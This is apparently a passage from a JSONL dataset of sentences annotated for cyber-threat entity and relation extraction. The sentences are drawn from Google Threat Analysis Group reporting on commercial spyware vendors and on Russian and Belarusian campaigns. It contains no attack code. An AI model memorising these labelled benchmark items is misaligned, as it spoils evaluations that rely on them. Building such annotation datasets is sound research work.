criminal activities, such as hacking and the use of spyware.","entities":[{"id":50232,"label":"identity","start_offset":0,"end_offset":3}],"relations":[],"Comments":[]} -{"id":4456,"text":"And we don’t just plug security holes – we work to eliminate entire classes of threats for consumers and businesses whose work depends on the Internet.","entities":[],"relations":[],"Comments":[]} -{"id":4457,"text":"We are joined in this effort by many other security teams at Google, including Project Zero, our team of security researchers at Google who study zero-day vulnerabilities in the hardware and software systems that are depended upon by users around the world.","entities":[{"id":50233,"label":"identity","start_offset":61,"end_offset":67},{"id":50234,"label":"identity","start_offset":79,"end_offset":91},{"id":50235,"label":"identity","start_offset":129,"end_offset":135}],"relations":[],"Comments":[]} -{"id":4458,"text":" Google has a long track record combating commercial surveillance tools targeting our users.","entities":[{"id":50236,"label":"identity","start_offset":1,"end_offset":7}],"relations":[],"Comments":[]} -{"id":4459,"text":"In 2017, Android – which is owned by Google – was the first mobile platform to warn users about NSO Group’s Pegasus spyware.","entities":[{"id":50241,"label":"malware","start_offset":108,"end_offset":115},{"id":50237,"label":"TIME","start_offset":3,"end_offset":7},{"id":50240,"label":"threat-actor","start_offset":96,"end_offset":105},{"id":50238,"label":"SOFTWARE","start_offset":9,"end_offset":16},{"id":50239,"label":"identity","start_offset":37,"end_offset":43}],"relations":[{"id":933,"from_id":50241,"to_id":50240,"type":"authored-by"}],"Comments":[]} -{"id":4460,"text":"At the time, our Android team released research about a newly discovered family of spyware related to Pegasus that was used in a targeted attack on a small number of Android devices.","entities":[{"id":50243,"label":"malware","start_offset":102,"end_offset":109},{"id":50244,"label":"SOFTWARE","start_offset":166,"end_offset":173},{"id":50245,"label":"identity","start_offset":17,"end_offset":29}],"relations":[{"id":934,"from_id":50243,"to_id":50244,"type":"targets"}],"Comments":[]} -{"id":4461,"text":"We observed fewer than three dozen installs of this spyware.","entities":[],"relations":[],"Comments":[]} -{"id":4462,"text":"We remediated the compromises for these users and implemented controls to protect all Android users.","entities":[{"id":50246,"label":"SOFTWARE","start_offset":86,"end_offset":93}],"relations":[],"Comments":[]} -{"id":4463,"text":"NSO Group continues to pose risks across the Internet ecosystem.","entities":[{"id":50247,"label":"threat-actor","start_offset":0,"end_offset":9}],"relations":[],"Comments":[]} -{"id":4464,"text":"In 2019, we confronted the risks posed by NSO Group again, relying upon NSO Groups’s marketing information suggesting that they had a 0-day exploit for Android.","entities":[{"id":50250,"label":"threat-actor","start_offset":72,"end_offset":82},{"id":50251,"label":"SOFTWARE","start_offset":152,"end_offset":159},{"id":50248,"label":"TIME","start_offset":3,"end_offset":7},{"id":50249,"label":"threat-actor","start_offset":42,"end_offset":51},{"id":50252,"label":"attack-pattern","start_offset":134,"end_offset":147}],"relations":[],"Comments":[]} -{"id":4465,"text":"Google was able to identify the vulnerability in use and fix the exploit quickly.","entities":[{"id":50253,"label":"identity","start_offset":0,"end_offset":6}],"relations":[],"Comments":[]} -{"id":4466,"text":"In December 2021, we released research about novel techniques used by NSO Group to compromise iMessage users.","entities":[{"id":50254,"label":"TIME","start_offset":3,"end_offset":16},{"id":50255,"label":"threat-actor","start_offset":70,"end_offset":79},{"id":50256,"label":"SOFTWARE","start_offset":94,"end_offset":102}],"relations":[],"Comments":[]} -{"id":4467,"text":"iPhone users could be compromised by receiving a malicious iMessage text, without ever needing to click a malicious link.","entities":[{"id":50257,"label":"SOFTWARE","start_offset":59,"end_offset":67}],"relations":[],"Comments":[]} -{"id":4468,"text":"Short of not using a device, there is no way to prevent exploitation by a zero-click exploit; it's a weapon against which there is no defense.","entities":[{"id":50258,"label":"attack-pattern","start_offset":74,"end_offset":92}],"relations":[],"Comments":[]} -{"id":4469,"text":"Based on our research and findings, we assessed this to be one of the most technically sophisticated exploits we had ever seen, further demonstrating that the capabilities NSO provides rival those previously thought to be accessible to only a handful of nation states.","entities":[{"id":50259,"label":"threat-actor","start_offset":172,"end_offset":175}],"relations":[],"Comments":[]} -{"id":4470,"text":"Although this Committee must be concerned with the exploits of NSO Group, it is not the only entity posing risks to our users.","entities":[{"id":50260,"label":"threat-actor","start_offset":63,"end_offset":72}],"relations":[],"Comments":[]} -{"id":4471,"text":"For example, TAG discovered campaigns targeting Armenian users which utilized zero-day vulnerabilities in Chrome and Internet Explorer.","entities":[{"id":50266,"label":"campaign","start_offset":28,"end_offset":37},{"id":50261,"label":"identity","start_offset":13,"end_offset":16},{"id":50265,"label":"SOFTWARE","start_offset":117,"end_offset":134},{"id":50262,"label":"location","start_offset":48,"end_offset":56},{"id":50263,"label":"vulnerability","start_offset":78,"end_offset":102},{"id":50264,"label":"SOFTWARE","start_offset":106,"end_offset":112}],"relations":[{"id":935,"from_id":50266,"to_id":50262,"type":"targets"},{"id":936,"from_id":50266,"to_id":50263,"type":"exploits"},{"id":937,"from_id":50264,"to_id":50263,"type":"has"},{"id":938,"from_id":50265,"to_id":50263,"type":"has"}],"Comments":[]} -{"id":4472,"text":"We assessed that a surveillance vendor packaged and sold these technologies.","entities":[],"relations":[],"Comments":[]} -{"id":4473,"text":"Reporting by CitizenLab linked this activity to Candiru, an Israeli spyware vendor.","entities":[{"id":50267,"label":"identity","start_offset":13,"end_offset":23},{"id":50268,"label":"threat-actor","start_offset":48,"end_offset":55},{"id":50269,"label":"location","start_offset":60,"end_offset":67}],"relations":[{"id":939,"from_id":50268,"to_id":50269,"type":"located-at"}],"Comments":[]} -{"id":4474,"text":"Other reporting from Microsoft has linked this spyware to the compromise of dozens of victims, including political dissidents, human rights activists, journalists, and academics.","entities":[{"id":50270,"label":"identity","start_offset":21,"end_offset":30}],"relations":[],"Comments":[]} -{"id":4475,"text":"Most recently, we reported in May on five zero-day vulnerabilities affecting Chrome and Android which were used to compromise Android users.","entities":[{"id":50274,"label":"SOFTWARE","start_offset":126,"end_offset":133},{"id":50271,"label":"vulnerability","start_offset":42,"end_offset":66},{"id":50272,"label":"SOFTWARE","start_offset":77,"end_offset":83},{"id":50273,"label":"SOFTWARE","start_offset":88,"end_offset":95}],"relations":[{"id":940,"from_id":50272,"to_id":50271,"type":"has"},{"id":941,"from_id":50273,"to_id":50271,"type":"has"}],"Comments":[]} -{"id":4476,"text":"We assess with high confidence that commercial surveillance company Cytrox packaged these vulnerabilities, and sold the hacking software to at least eight governments.","entities":[{"id":50275,"label":"threat-actor","start_offset":68,"end_offset":74}],"relations":[],"Comments":[]} -{"id":4477,"text":"Among other targets, this spyware was used to compromise journalists and opposition politicians.","entities":[],"relations":[],"Comments":[]} -{"id":4478,"text":"Our reporting is consistent with earlier analysis produced by CitizenLab and Meta.","entities":[{"id":50276,"label":"identity","start_offset":62,"end_offset":72},{"id":50277,"label":"identity","start_offset":77,"end_offset":81}],"relations":[],"Comments":[]} -{"id":4479,"text":"TAG also recently released information on a segment of attackers we call “hack-for-hire” that focuses on compromising accounts and exfiltrating data as a service.","entities":[{"id":50279,"label":"attack-pattern","start_offset":131,"end_offset":161},{"id":50278,"label":"identity","start_offset":0,"end_offset":3},{"id":50280,"label":"attack-pattern","start_offset":74,"end_offset":87}],"relations":[],"Comments":[]} -{"id":4480,"text":"In contrast to commercial surveillance vendors, who we generally observe selling a capability for the end user to operate, hack-for-hire firms conduct attacks themselves.","entities":[{"id":50281,"label":"attack-pattern","start_offset":123,"end_offset":136}],"relations":[],"Comments":[]} -{"id":4481,"text":"They target a wide range of users and opportunistically take advantage of known security flaws when undertaking their campaigns.","entities":[],"relations":[],"Comments":[]} -{"id":4482,"text":"In June, we provided examples of the hack-for-hire ecosystem from India, Russia, and the United Arab Emirates.","entities":[{"id":50286,"label":"location","start_offset":89,"end_offset":109},{"id":50282,"label":"TIME","start_offset":3,"end_offset":7},{"id":50283,"label":"attack-pattern","start_offset":37,"end_offset":50},{"id":50285,"label":"location","start_offset":73,"end_offset":79},{"id":50284,"label":"location","start_offset":66,"end_offset":71}],"relations":[],"Comments":[]} -{"id":4483,"text":"The growth of commercial spyware vendors and hack-for-hire groups has necessitated growth in TAG to counter these threats.","entities":[{"id":50287,"label":"attack-pattern","start_offset":45,"end_offset":58},{"id":50288,"label":"identity","start_offset":93,"end_offset":96}],"relations":[],"Comments":[]} -{"id":4484,"text":"Where once we only needed substreams to focus on threat actors such as China, Russia, and North Korea, TAG now has a dedicated analysis subteam dedicated to commercial vendors and operators.","entities":[{"id":50289,"label":"location","start_offset":71,"end_offset":76},{"id":50290,"label":"location","start_offset":78,"end_offset":84},{"id":50291,"label":"location","start_offset":90,"end_offset":101},{"id":50292,"label":"identity","start_offset":103,"end_offset":106}],"relations":[],"Comments":[]} -{"id":4485,"text":" Our findings underscore the extent to which commercial surveillance vendors have proliferated capabilities historically only used by governments.","entities":[],"relations":[],"Comments":[]} -{"id":4486,"text":"These vendors operate with deep technical expertise to develop and operationalize exploits.","entities":[],"relations":[],"Comments":[]} -{"id":4487,"text":"We believe its use is growing, fueled by demand from governments.","entities":[],"relations":[],"Comments":[]} -{"id":4488,"text":"Seven of the nine zero-day vulnerabilities our Threat Analysis Group discovered in 2021 were originally developed by commercial providers and sold to and used by state-sponsored actors.","entities":[{"id":50293,"label":"identity","start_offset":47,"end_offset":68},{"id":50294,"label":"vulnerability","start_offset":18,"end_offset":42}],"relations":[],"Comments":[]} -{"id":4489,"text":"TAG is actively tracking more than 30 vendors with varying levels of sophistication and public exposure selling exploits or surveillance capabilities to state-sponsored actors.","entities":[{"id":50295,"label":"identity","start_offset":0,"end_offset":3}],"relations":[],"Comments":[]} -{"id":4490,"text":"This industry appears to be thriving.","entities":[],"relations":[],"Comments":[]} -{"id":4493,"text":"These vendors are enabling the proliferation of dangerous hacking tools, arming nation state actors that would not otherwise be able to develop these capabilities in-house.","entities":[],"relations":[],"Comments":[]} -{"id":4494,"text":"While use of surveillance technologies may be legal under national or international laws, they are found to be used by some state actors for purposes antithetical to democratic values: targeting dissidents, journalists, human rights workers, and opposition party politicians.","entities":[],"relations":[],"Comments":[]} -{"id":4495,"text":"We have also observed proliferation risk from nation state actors attempting to gain access to the exploits of these vendors.","entities":[],"relations":[],"Comments":[]} -{"id":4496,"text":"Last year, TAG identified an ongoing campaign targeting security researchers working on vulnerability research and development at different companies and organizations.","entities":[{"id":50298,"label":"identity","start_offset":11,"end_offset":14}],"relations":[],"Comments":[]} -{"id":4497,"text":"The actors behind this campaign, which we attributed to a government-backed entity based in North Korea, have employed a number of means to target researchers.","entities":[{"id":50299,"label":"campaign","start_offset":23,"end_offset":31},{"id":50300,"label":"location","start_offset":92,"end_offset":103}],"relations":[{"id":942,"from_id":50299,"to_id":50300,"type":"attributed-to"}],"Comments":[]} -{"id":4498,"text":"In addition to these concerns, there are other reasons why this industry presents a risk more broadly across the Internet.","entities":[],"relations":[],"Comments":[]} -{"id":4499,"text":"While vulnerability research is an important contributor to online safety when that research is used to improve the security of products, vendors stockpiling zero-day vulnerabilities in secret can pose a severe risk to the Internet when the vendor itself gets compromised.","entities":[{"id":50301,"label":"attack-pattern","start_offset":158,"end_offset":182}],"relations":[],"Comments":[]} -{"id":4500,"text":"This has happened to multiple spyware vendors over the past ten years, raising the specter that their stockpiles can be released publicly without warning.","entities":[],"relations":[],"Comments":[]} -{"id":4501,"text":"The proliferation of commercial hacking tools is a threat to national security, making the Internet less safe and undermining the trust on which a vibrant, inclusive digital society depends.","entities":[],"relations":[],"Comments":[]} -{"id":4502,"text":"This is why when Google discovers these activities, we not only take steps to protect users, but also disclose that information publicly to raise awareness and help the entire ecosystem, in line with our historical commitment to openness and democratic values.","entities":[{"id":50302,"label":"identity","start_offset":17,"end_offset":23}],"relations":[],"Comments":[]} -{"id":4503,"text":"Across all Google products, we incorporate industry-leading security features and protections to keep our users safe.","entities":[{"id":50303,"label":"identity","start_offset":11,"end_offset":17}],"relations":[],"Comments":[]} -{"id":4504,"text":"On Search, Google’s Safe Browsing is an industry-leading service to identify unsafe websites across the web and notify users and website owners of potential harm.","entities":[{"id":50304,"label":"identity","start_offset":11,"end_offset":17}],"relations":[],"Comments":[]} -{"id":4505,"text":"Google Safe Browsing helps protect over four billion devices every day by showing warnings to users when they attempt to navigate to unsafe sites or download harmful files.","entities":[{"id":50305,"label":"SOFTWARE","start_offset":0,"end_offset":20}],"relations":[],"Comments":[]} -{"id":4506,"text":"Safe Browsing also notifies webmasters when their websites are compromised by malicious actors and helps them diagnose and resolve the problem so that their visitors stay safer.","entities":[{"id":50306,"label":"SOFTWARE","start_offset":0,"end_offset":13}],"relations":[],"Comments":[]} -{"id":4507,"text":"On Gmail, we recommend certain Gmail security precautions to prevent spoofing, phishing, and spam.","entities":[{"id":50307,"label":"identity","start_offset":3,"end_offset":8},{"id":50308,"label":"identity","start_offset":31,"end_offset":36},{"id":50309,"label":"attack-pattern","start_offset":69,"end_offset":77},{"id":50311,"label":"attack-pattern","start_offset":93,"end_offset":97},{"id":50310,"label":"attack-pattern","start_offset":79,"end_offset":87}],"relations":[],"Comments":[]} -{"id":4508,"text":"Spoofers may send forged messages using an organization’s real name or domain to subvert authentication measures.","entities":[],"relations":[],"Comments":[]} -{"id":4509,"text":"We use email authentication to protect against email spoofing, which is when email content is changed to make the message appear from someone or somewhere other than the actual source.","entities":[],"relations":[],"Comments":[]} -{"id":4510,"text":"And we offer other advanced phishing and malware protection to administrators to better protect their users.","entities":[],"relations":[],"Comments":[]} -{"id":4511,"text":"By default, Gmail displays warnings and moves untrustworthy emails to the user’s spam folder.","entities":[{"id":50312,"label":"SOFTWARE","start_offset":12,"end_offset":17}],"relations":[],"Comments":[]} -{"id":4512,"text":"However administrators can also use advanced security settings to enhance their users’ protection against suspicious attachments and scripts from untrusted senders.","entities":[],"relations":[],"Comments":[]} -{"id":4513,"text":"For Android, through its entire development lifecycle, we subject the products to a rigorous security program.","entities":[{"id":50313,"label":"SOFTWARE","start_offset":4,"end_offset":11}],"relations":[],"Comments":[]} -{"id":4514,"text":"The Android security process begins early in the development lifecycle, and each major feature of the platform is reviewed by engineering and security resources.","entities":[{"id":50314,"label":"SOFTWARE","start_offset":4,"end_offset":11}],"relations":[],"Comments":[]} -{"id":4515,"text":"We ensure appropriate controls are built into the architecture of the system.","entities":[],"relations":[],"Comments":[]} -{"id":4516,"text":"During the development stage, Android-created and open source components are subject to vigorous security reviews","entities":[{"id":50315,"label":"SOFTWARE","start_offset":30,"end_offset":37}],"relations":[],"Comments":[]} -{"id":4517,"text":"For users, Android provides safety and control over how apps and third parties can access the data from their devices.","entities":[{"id":50316,"label":"SOFTWARE","start_offset":11,"end_offset":18}],"relations":[],"Comments":[]} -{"id":4518,"text":"For example, users are provided visibility into the permissions requested by each app, and they are able to control those permissions.","entities":[],"relations":[],"Comments":[]} -{"id":4519,"text":"We have also built additional tools to prevent successful attacks on devices that run Android once those devices are in users’ hands.","entities":[{"id":50317,"label":"SOFTWARE","start_offset":86,"end_offset":93}],"relations":[],"Comments":[]} -{"id":4520,"text":"For example, Google Play Protect, our built-in malware protection for Android, continuously scans devices for potentially harmful applications.","entities":[{"id":50318,"label":"SOFTWARE","start_offset":13,"end_offset":32},{"id":50319,"label":"SOFTWARE","start_offset":70,"end_offset":77}],"relations":[],"Comments":[]} -{"id":4521,"text":"Although our security precautions are robust, security issues can still occur, which is why we created a comprehensive security response process to respond to incidents.","entities":[],"relations":[],"Comments":[]} -{"id":4522,"text":"Google manages a vulnerability rewards program (VRP), rewarding researchers millions of dollars for their contributions in securing our devices and platforms.","entities":[{"id":50320,"label":"identity","start_offset":0,"end_offset":6}],"relations":[],"Comments":[]} -{"id":4523,"text":"We also provide research grants to security researchers to help fund and support the research community.","entities":[],"relations":[],"Comments":[]} -{"id":4524,"text":"This is all part of a larger strategy to keep Google products and users, as well as the Internet at large more secure.","entities":[{"id":50321,"label":"identity","start_offset":46,"end_offset":52}],"relations":[],"Comments":[]} -{"id":4525,"text":"Project Zero is also a critical component of this strategy, pushing transparency and more timely patching of vulnerabilities.","entities":[],"relations":[],"Comments":[]} -{"id":4526,"text":"Finally, we also offer the leading tools to protect important civil society actors such as journalists, human rights workers, opposition party politicians, and campaign organizations – in other words, the users who are frequently targeted by surveillance tools.","entities":[],"relations":[],"Comments":[]} -{"id":4527,"text":"Google developed Project Shield, a free protection against distributed denial of service (DDoS) attacks, to protect news media and human rights organization websites.","entities":[{"id":50323,"label":"attack-pattern","start_offset":59,"end_offset":95},{"id":50322,"label":"identity","start_offset":0,"end_offset":6}],"relations":[],"Comments":[]} -{"id":4528,"text":"We recently expanded eligibility to protect Ukraine government organizations, and we are currently protecting over 200 Ukraine websites today.","entities":[{"id":50324,"label":"identity","start_offset":44,"end_offset":76},{"id":50325,"label":"location","start_offset":119,"end_offset":126}],"relations":[],"Comments":[]} -{"id":4529,"text":"To protect high risk user accounts, we offer the Advanced Protection Program (APP), which is our highest form of account security.","entities":[],"relations":[],"Comments":[]} -{"id":4530,"text":"APP has a strong track record protecting users – since the program’s inception, there are no documented cases of an account compromise via phishing.","entities":[{"id":50326,"label":"attack-pattern","start_offset":116,"end_offset":147}],"relations":[],"Comments":[]} -{"id":4531,"text":" We believe it is time for government, industry and civil society to come together to change the incentive structure which has allowed these technologies to spread in secret.","entities":[],"relations":[],"Comments":[]} -{"id":4532,"text":"The first step is to understand the scope of the problem.","entities":[],"relations":[],"Comments":[]} -{"id":4533,"text":"We appreciate the Committee’s focus on this issue, and recommend the U.S. Intelligence Community prioritize identifying and analyzing threats from foreign commercial spyware providers as being on par with other major advanced threat actors.","entities":[{"id":50327,"label":"identity","start_offset":69,"end_offset":96}],"relations":[],"Comments":[]} -{"id":4535,"text":"The U.S. could also set an example to other governments by reviewing and disclosing its own historical use of these tools.","entities":[{"id":50329,"label":"identity","start_offset":4,"end_offset":8}],"relations":[],"Comments":[]} -{"id":4536,"text":"We welcome recent steps taken by the government in applying sanctions to the NSO Group and Candiru, and we believe other governments should consider expanding these restrictions.","entities":[{"id":50330,"label":"threat-actor","start_offset":77,"end_offset":86},{"id":50331,"label":"threat-actor","start_offset":91,"end_offset":98}],"relations":[],"Comments":[]} -{"id":4537,"text":"Additionally, the U.S. government should consider a full ban on Federal procurement of commercial spyware technologies and contemplate imposing further sanctions to limit spyware vendors’ ability to operate in the U.S. and receive U.S. investment.","entities":[{"id":50332,"label":"identity","start_offset":18,"end_offset":33},{"id":50333,"label":"location","start_offset":214,"end_offset":218},{"id":50334,"label":"location","start_offset":231,"end_offset":235}],"relations":[],"Comments":[]} -{"id":4538,"text":"The harms from this industry are amply evident by this point, and we believe they outweigh any benefit to continued use.","entities":[],"relations":[],"Comments":[]} -{"id":4540,"text":"Any one government’s ability to meaningfully impact this market is limited; only through a concerted international effort can this serious risk to online safety be mitigated.","entities":[],"relations":[],"Comments":[]} -{"id":4541,"text":"Google is investing heavily as a company and as an industry to counter serious threats to our users.","entities":[{"id":50336,"label":"identity","start_offset":0,"end_offset":6}],"relations":[],"Comments":[]} -{"id":4542,"text":"In the modern world, we must be able to trust the devices we use every day and ensure that foreign adversaries do not have access to sophisticated exploits.","entities":[],"relations":[],"Comments":[]} -{"id":4543,"text":"While we continue to fight these threats on a technical level, the providers of these capabilities operate openly in democratic countries.","entities":[],"relations":[],"Comments":[]} -{"id":4544,"text":"Google is committed to leading the industry in detecting and disrupting these threats.","entities":[{"id":50337,"label":"identity","start_offset":0,"end_offset":6}],"relations":[],"Comments":[]} -{"id":4545,"text":"I thank the Committee for this attention on this critical issue.","entities":[],"relations":[],"Comments":[]} -{"id":4546,"text":"Google’s Threat Analysis Group (TAG) continues to closely monitor the cybersecurity environment in Eastern Europe with regard to the war in Ukraine.","entities":[{"id":50338,"label":"identity","start_offset":0,"end_offset":36},{"id":50339,"label":"location","start_offset":99,"end_offset":113},{"id":50340,"label":"location","start_offset":140,"end_offset":147}],"relations":[],"Comments":[]} -{"id":4547,"text":"Many Russian government cyber assets have remained focused on Ukraine and related issues since the invasion began, while Russian APT activity outside of Ukraine largely remains the same.","entities":[{"id":50344,"label":"location","start_offset":153,"end_offset":160},{"id":50342,"label":"location","start_offset":62,"end_offset":69},{"id":50343,"label":"threat-actor","start_offset":121,"end_offset":132},{"id":50346,"label":"threat-actor","start_offset":5,"end_offset":36}],"relations":[{"id":943,"from_id":50346,"to_id":50342,"type":"targets"}],"Comments":[]} -{"id":4548,"text":"TAG continues to disrupt campaigns from multiple sets of Russian government-backed attackers, some of which are detailed in our previous updates.","entities":[{"id":50347,"label":"identity","start_offset":0,"end_offset":3},{"id":50348,"label":"threat-actor","start_offset":57,"end_offset":92}],"relations":[],"Comments":[]} -{"id":4549,"text":"Similarly, Russian observed disinformation efforts are also focused on the war in Ukraine and TAG has disrupted coordinated influence operations from several actors including the Internet Research Agency and a Russian consulting firm as detailed in the TAG Bulletin.","entities":[{"id":50351,"label":"threat-actor","start_offset":179,"end_offset":203},{"id":50349,"label":"location","start_offset":82,"end_offset":89},{"id":50350,"label":"identity","start_offset":94,"end_offset":97},{"id":50352,"label":"threat-actor","start_offset":210,"end_offset":233},{"id":50353,"label":"identity","start_offset":253,"end_offset":256}],"relations":[{"id":944,"from_id":50351,"to_id":50349,"type":"targets"},{"id":945,"from_id":50352,"to_id":50349,"type":"targets"}],"Comments":[]} -{"id":4551,"text":"Here is a deeper look at some campaign activity TAG has observed since our last update: Turla, a group publicly attributed to Russia’s Federal Security Service (FSB), recently hosted Android apps on a domain spoofing the Ukrainian Azov Regiment.","entities":[{"id":50355,"label":"identity","start_offset":48,"end_offset":51},{"id":50356,"label":"threat-actor","start_offset":88,"end_offset":93},{"id":50357,"label":"identity","start_offset":135,"end_offset":165},{"id":50358,"label":"location","start_offset":126,"end_offset":132},{"id":50359,"label":"SOFTWARE","start_offset":183,"end_offset":190},{"id":50360,"label":"identity","start_offset":221,"end_offset":244}],"relations":[{"id":946,"from_id":50356,"to_id":50357,"type":"attributed-to"},{"id":947,"from_id":50357,"to_id":50358,"type":"located-at"},{"id":948,"from_id":50357,"to_id":50360,"type":"impersonates"}],"Comments":[]} -{"id":4552,"text":"This is the first known instance of Turla distributing Android-related malware.","entities":[{"id":50361,"label":"threat-actor","start_offset":36,"end_offset":41},{"id":50362,"label":"SOFTWARE","start_offset":55,"end_offset":62}],"relations":[{"id":949,"from_id":50361,"to_id":50362,"type":"targets"}],"Comments":[]} -{"id":4553,"text":"The apps were not distributed through the Google Play Store, but hosted on a domain controlled by the actor and disseminated via links on third party messaging services.","entities":[{"id":50363,"label":"SOFTWARE","start_offset":42,"end_offset":59}],"relations":[],"Comments":[]} -{"id":4554,"text":"We believe there was no major impact on Android users and that the number of installs was miniscule.","entities":[{"id":50364,"label":"SOFTWARE","start_offset":40,"end_offset":47}],"relations":[],"Comments":[]} -{"id":4555,"text":"The app is distributed under the guise of performing Denial of Service (DoS) attacks against a set of Russian websites.","entities":[{"id":50365,"label":"attack-pattern","start_offset":53,"end_offset":76}],"relations":[],"Comments":[]} -{"id":4556,"text":"However, the 'DoS' consists only of a single GET request to the target website, not enough to be effective.","entities":[{"id":50366,"label":"attack-pattern","start_offset":14,"end_offset":17}],"relations":[],"Comments":[]} -{"id":4557,"text":"The list of target websites for the app can be seen in the CyberChef recipe here.","entities":[{"id":50367,"label":"SOFTWARE","start_offset":59,"end_offset":68}],"relations":[],"Comments":[]} -{"id":4558,"text":"During our investigation into the Turla CyberAzov apps, we identified another Android app first seen in the wild in March 2022 that also claimed to conduct DoS attacks against Russian websites.","entities":[{"id":50370,"label":"TIME","start_offset":116,"end_offset":126},{"id":50368,"label":"malware","start_offset":34,"end_offset":54},{"id":50369,"label":"SOFTWARE","start_offset":78,"end_offset":85},{"id":50371,"label":"attack-pattern","start_offset":156,"end_offset":159},{"id":50372,"label":"location","start_offset":176,"end_offset":183}],"relations":[{"id":950,"from_id":50368,"to_id":50369,"type":"targets"}],"Comments":[]} -{"id":4559,"text":"In this case, the Android app name was stopwar.apk (com.ddos.stopwar) and was distributed from the website stopwar.pro.","entities":[{"id":50373,"label":"SOFTWARE","start_offset":18,"end_offset":25},{"id":50375,"label":"malware","start_offset":52,"end_offset":68},{"id":50376,"label":"DOMAIN","start_offset":107,"end_offset":118},{"id":50374,"label":"malware","start_offset":39,"end_offset":50}],"relations":[],"Comments":[]} -{"id":4560,"text":"This app is quite different from the Turla apps described above and written by a different developer.","entities":[{"id":50377,"label":"threat-actor","start_offset":37,"end_offset":42}],"relations":[],"Comments":[]} -{"id":4561,"text":"It also downloads a list of targets from an external site, but unlike the Turla apps, it continually sends requests to the target websites until it is stopped by the user.","entities":[{"id":50378,"label":"threat-actor","start_offset":74,"end_offset":79}],"relations":[],"Comments":[]} -{"id":4562,"text":"Based on our analysis, we believe that the StopWar app was developed by pro-Ukrainian developers and was the inspiration for what Turla actors based their fake CyberAzov DoS app off of.","entities":[{"id":50379,"label":"malware","start_offset":43,"end_offset":54},{"id":50380,"label":"threat-actor","start_offset":130,"end_offset":142},{"id":50381,"label":"malware","start_offset":160,"end_offset":177}],"relations":[{"id":951,"from_id":50381,"to_id":50380,"type":"authored-by"}],"Comments":[]} -{"id":4563,"text":"Indicators: The Follina vulnerability (CVE-2022-30190), first disclosed in late May, received significant usage from both APT and cybercrime groups throughout June after it was patched by Microsoft.","entities":[{"id":50382,"label":"vulnerability","start_offset":16,"end_offset":54},{"id":50383,"label":"TIME","start_offset":75,"end_offset":83},{"id":50384,"label":"TIME","start_offset":159,"end_offset":163},{"id":50385,"label":"identity","start_offset":188,"end_offset":197}],"relations":[],"Comments":[]} -{"id":4564,"text":"Follina is a remote code execution (RCE) vulnerability in the Microsoft Windows Support Diagnostic Tool (MSDT).","entities":[{"id":50386,"label":"vulnerability","start_offset":13,"end_offset":54},{"id":50387,"label":"SOFTWARE","start_offset":62,"end_offset":110}],"relations":[{"id":952,"from_id":50387,"to_id":50386,"type":"has"}],"Comments":[]} -{"id":4565,"text":"Consistent with CERT-UA reporting, TAG observed multiple Russian GRU actors - APT28 and Sandworm - conduct campaigns exploiting the Follina vulnerability.","entities":[{"id":50390,"label":"identity","start_offset":35,"end_offset":38},{"id":50389,"label":"identity","start_offset":16,"end_offset":23},{"id":50391,"label":"identity","start_offset":57,"end_offset":68},{"id":50392,"label":"threat-actor","start_offset":78,"end_offset":83},{"id":50394,"label":"vulnerability","start_offset":132,"end_offset":153},{"id":50393,"label":"threat-actor","start_offset":88,"end_offset":96}],"relations":[{"id":956,"from_id":50393,"to_id":50391,"type":"attributed-to"},{"id":953,"from_id":50393,"to_id":50394,"type":"exploits"},{"id":954,"from_id":50392,"to_id":50394,"type":"exploits"},{"id":955,"from_id":50392,"to_id":50391,"type":"attributed-to"}],"Comments":[]} -{"id":4566,"text":"The Sandworm campaign used compromised government accounts to send links to Microsoft Office documents hosted on compromised domains, primarily targeting media organizations in Ukraine.","entities":[{"id":50395,"label":"campaign","start_offset":4,"end_offset":21},{"id":50396,"label":"attack-pattern","start_offset":27,"end_offset":58},{"id":50397,"label":"SOFTWARE","start_offset":76,"end_offset":92},{"id":50398,"label":"location","start_offset":177,"end_offset":184}],"relations":[{"id":957,"from_id":50395,"to_id":50396,"type":"uses"},{"id":958,"from_id":50395,"to_id":50397,"type":"targets"}],"Comments":[]} -{"id":4567,"text":"TAG has also observed an increasing number of financially motivated actors targeting Ukraine.","entities":[{"id":50399,"label":"identity","start_offset":0,"end_offset":3},{"id":50400,"label":"location","start_offset":85,"end_offset":92}],"relations":[],"Comments":[]} -{"id":4568,"text":"One recent campaign from a group tracked by CERT-UA as UAC-0098 delivered malicious documents with the Follina exploit in password-protected archives, impersonating the State Tax Service of Ukraine.","entities":[{"id":50401,"label":"identity","start_offset":44,"end_offset":51},{"id":50402,"label":"threat-actor","start_offset":55,"end_offset":63},{"id":50403,"label":"vulnerability","start_offset":103,"end_offset":118},{"id":50404,"label":"identity","start_offset":169,"end_offset":197}],"relations":[{"id":959,"from_id":50402,"to_id":50404,"type":"impersonates"},{"id":960,"from_id":50402,"to_id":50403,"type":"uses"}],"Comments":[]} -{"id":4569,"text":"We assess this actor is a former initial ransomware access broker who previously worked with the Conti ransomware group distributing the IcedID banking trojan based on overlaps in infrastructure, tools used in previous campaigns, and a unique cryptor.","entities":[{"id":50405,"label":"threat-actor","start_offset":97,"end_offset":102},{"id":50406,"label":"malware","start_offset":137,"end_offset":158}],"relations":[{"id":961,"from_id":50405,"to_id":50406,"type":"uses"}],"Comments":[]} -{"id":4570,"text":"Ghostwriter\/UNC1151, a threat actor attributed to Belarus, has remained active targeting accounts of webmail and social media networks of Polish users.","entities":[{"id":50408,"label":"threat-actor","start_offset":12,"end_offset":19},{"id":50407,"label":"threat-actor","start_offset":0,"end_offset":11},{"id":50409,"label":"location","start_offset":50,"end_offset":57},{"id":50410,"label":"location","start_offset":138,"end_offset":144}],"relations":[{"id":962,"from_id":50408,"to_id":50407,"type":"duplicate-of"},{"id":963,"from_id":50407,"to_id":50409,"type":"attributed-to"},{"id":964,"from_id":50408,"to_id":50409,"type":"attributed-to"},{"id":965,"from_id":50408,"to_id":50410,"type":"targets"},{"id":966,"from_id":50407,"to_id":50410,"type":"targets"}],"Comments":[]} -{"id":4571,"text":"They continue to use the 'Browser in the Browser' phishing technique that TAG first observed and described in March.","entities":[{"id":50413,"label":"TIME","start_offset":110,"end_offset":115},{"id":50411,"label":"attack-pattern","start_offset":26,"end_offset":68},{"id":50412,"label":"identity","start_offset":74,"end_offset":77}],"relations":[],"Comments":[]} -{"id":4572,"text":"An example of this technique, used to target Facebook users, can be seen in the screenshot below.","entities":[{"id":50414,"label":"SOFTWARE","start_offset":45,"end_offset":53}],"relations":[],"Comments":[]} -{"id":4573,"text":"COLDRIVER, a Russian-based threat actor sometimes referred to as Callisto, continues to send credential phishing emails to targets including government and defense officials, politicians, NGOs and think tanks, and 